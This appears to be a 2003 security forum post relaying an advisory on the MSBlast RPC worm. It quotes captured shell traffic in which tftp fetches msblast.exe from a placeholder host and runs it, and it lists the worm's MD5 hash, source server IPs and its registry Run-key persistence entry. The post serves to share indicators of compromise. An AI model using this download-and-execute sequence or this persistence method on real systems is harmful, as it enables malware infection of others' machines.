|
-
August 12th, 2003, 01:58 AM
#24
Member
Hi people!
Hispasec (www.hispasec.com) report today a new worm based on RPC exploit...
The worm send commands to windows shell in tcp port 4444.
There is captured traffic...
-------------trafic 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------tráfico 4444/tcp----------
mblast.exe is a Windows file, 6 KB len.
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
The download is from this tftp servers:
204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3
The worm make a entry in Windows registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"windows auto update"="msblast.exe"
****************************************************************************************
Keep the eyes open!!
See u!
Groby
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote